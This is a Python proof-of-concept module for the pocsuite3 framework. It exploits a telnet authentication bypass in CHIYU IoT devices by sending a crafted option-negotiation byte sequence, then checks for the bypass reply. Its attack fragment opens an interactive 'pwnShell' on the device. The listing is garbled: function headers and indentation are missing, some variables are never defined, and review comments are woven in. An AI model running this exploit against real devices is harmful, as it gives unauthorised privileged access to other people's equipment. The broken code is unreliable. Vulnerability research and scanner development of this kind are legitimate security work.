import socket
from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD
# PoC metadata consumed by the pocsuite3 framework; the attribute names are part
# of its contract, so only the values are meant to be edited.
author: str = 'sirpedrotavares'
createDate: str = '2021-04-15'
updateDate: str = '2021-04-15'
# Public write-up this PoC is based on.
references: list[str] = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
appPowerLink: str = 'https://www.chiyu-tech.com'
# Free-text marker only: the check below talks to the telnet service directly
# and does not fingerprint a firmware version.
appVersion: str = 'Telnet service (all versions)'
vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
category = POC_CATEGORY.TOOLS.CRACK
# NOTE(review): "TELENT" is the constant name as spelled in pocsuite3's
# POC_CATEGORY.PROTOCOL enum; do not "correct" it to TELNET without confirming
# the installed library exposes that name.
protocol = POC_CATEGORY.PROTOCOL.TELENT
An authentication bypass in the telnet server of CHIYU Technology Inc. devices allows an unauthenticated attacker to obtain a privileged
connection to the target device by sending a specially crafted telnet option-negotiation sequence.
Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
telnet authentication process due to an overflow during the negotiation of the telnet protocol.
Because the malformed request is processed during option negotiation, before any credentials are requested, an attacker
can make the remote telnet server treat the session as already authenticated. Several models
are affected, including BF-430, BF-431, BF-450M, and SEMAC, even on the most recent firmware versions at the time of writing.
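# Telnet option-negotiation burst the bypass relies on: IAC WILL ECHO,
# IAC WILL SUPPRESS-GO-AHEAD, IAC DO TERMINAL-TYPE (RFC 854 option codes 1, 3, 24).
_TELNET_PROBE = b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18"
# Reply the original check treats as "authentication skipped": IAC DONT ECHO.
_BYPASS_REPLY = b"\xff\xfe\x01"


# NOTE(review): the ``def`` line is missing from this listing; ``_verify`` is the
# pocsuite3 verify entry point this body corresponds to (the path that hands a
# ``VerifyInfo`` dict to ``parse_attack``). Confirm the name against the original.
def _verify(self):
    """Probe the target's telnet service for the CHIYU authentication bypass.

    Connects to ``rhost``:``rport`` (default 23), sends the negotiation burst
    three times (as the original check did) and reads the first reply, allowing
    one extra read in case a banner precedes it. A bare IAC DONT ECHO reply with
    no login ("Username") prompt is taken as the bypass; anything else, an
    unreachable host, a timeout or a reset is reported as not vulnerable.

    Returns:
        Whatever ``parse_attack`` builds: for a confirmed bypass it receives
        ``{'VerifyInfo': {'rhost': self.url}}``, otherwise ``None``.

    Fixes over the original fragment: ``socket.setdefaulttimeout`` was called
    *after* the socket was created, so it never applied and ``recv`` could block
    forever; the socket was never closed; ``connect_ex``'s result was only
    checked after the probe had already been sent.
    """
    host = self.getg_option("rhost")
    port = int(self.getg_option("rport") or 23)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)  # per-socket, so it actually bounds connect/send/recv
    try:
        if sock.connect_ex((host, port)) != 0:
            return self.parse_attack(None)
        for _ in range(3):
            sock.sendall(_TELNET_PROBE)
        reply = sock.recv(1024).strip()
        # The device may emit a banner first; one more read for the option reply.
        if reply != _BYPASS_REPLY:
            reply = sock.recv(1024).strip()
    except OSError:
        # timeout / refused / reset: not vulnerable (or unreachable), not a crash
        return self.parse_attack(None)
    finally:
        sock.close()

    # A login prompt means authentication is enforced; only the exact IAC DONT
    # ECHO reply (which cannot contain "sername") indicates the bypass.
    if b"sername" in reply or reply != _BYPASS_REPLY:
        return self.parse_attack(None)

    result = {'VerifyInfo': {'rhost': self.url}}
    return self.parse_attack(result)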
# --- attack fragment ---------------------------------------------------------
# NOTE(review): the ``def`` line, the ``try``, the interactive loop and the
# ``except`` bodies that surround these statements are missing from this
# listing; the lines below are kept verbatim and only annotated.
host = self.getg_option("rhost")
port = self.getg_option("rport") or 23
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# BUG: setdefaulttimeout() only affects sockets created *after* the call, so
# ``s`` has no timeout and the recv() calls below can block forever;
# ``s.settimeout(10)`` is what was intended.
socket.setdefaulttimeout(10)
connect = s.connect_ex((host, int(port)))
# Telnet option negotiation: IAC WILL ECHO, IAC WILL SUPPRESS-GO-AHEAD,
# IAC DO TERMINAL-TYPE, sent three times. ``connect`` is not checked first, so a
# failed connect surfaces here as an OSError from send().
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
aux = s.recv(1024).strip()
# One extra read in case a banner precedes the option reply.
if aux != b'\xff\xfe\x01':
aux = s.recv(1024).strip()
# IAC DONT ECHO without a login ("Username") prompt: authentication was skipped.
if connect == 0 and "sername" not in str(aux):
if b"\xff\xfe\x01" == aux:
print("Connected! ;)\ntype: \"help\"\n\n")
# Interactive operator shell over the bypassed telnet session (cleartext on the wire).
cmd = input("(CHIYU pwnShell:) $ ")
# NOTE(review): ``body`` is never assigned in this listing (the line turning
# ``cmd`` into the wire payload is missing); as written this raises NameError.
s.send(body.encode('utf-8', 'ignore'))
result = s.recv(1024).decode('utf8', 'ignore')
# NOTE(review): this message belongs to an error/else branch whose structure was lost.
print("[+] CHIYU device not available, try again ... (terminating)")
# BUG: str.strip('CMD>') strips any of the characters C, M, D, > from both
# ends of the output, not the literal "CMD>" prompt, so command output that
# happens to end in one of those letters is mangled; use
# result.replace('CMD>', '') (or removeprefix/removesuffix on 3.9+).
print(result.strip('CMD>'))
# NOTE(review): ``b`` is likewise unbound here; presumably a second command string.
s.send(b.encode('utf-8', 'ignore'))
# decode() without errors='ignore' -- unlike the read above -- raises on non-UTF-8 device output.
result = s.recv(1024).decode()
print(result.strip('CMD>'))
# ``output`` and ``e`` come from the missing ``except ... as e`` frame; note the
# socket is never closed on any path shown here.
output.fail('target is not vulnerable:' + str(e))
# Handler body is outside this listing; on Ctrl-C the socket should still be closed.
except KeyboardInterrupt:
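def parse_attack(self, result):
    """Wrap the verify/attack outcome in a pocsuite3 ``Output``.

    Args:
        result: ``{'VerifyInfo': {...}}`` built by the caller when the bypass
            was confirmed, or ``None`` when it was not (the callers in this
            file pass exactly these two shapes).

    Returns:
        The ``Output`` object the framework expects. The original fragment left
        ``output`` unbound and returned nothing.
    """
    output = Output(self)
    if result:
        # NOTE(review): success() is the positive-result call of pocsuite3's
        # Output API; confirm the name against the installed version.
        output.success(result)
    else:
        output.fail('target is not vulnerable')
    return output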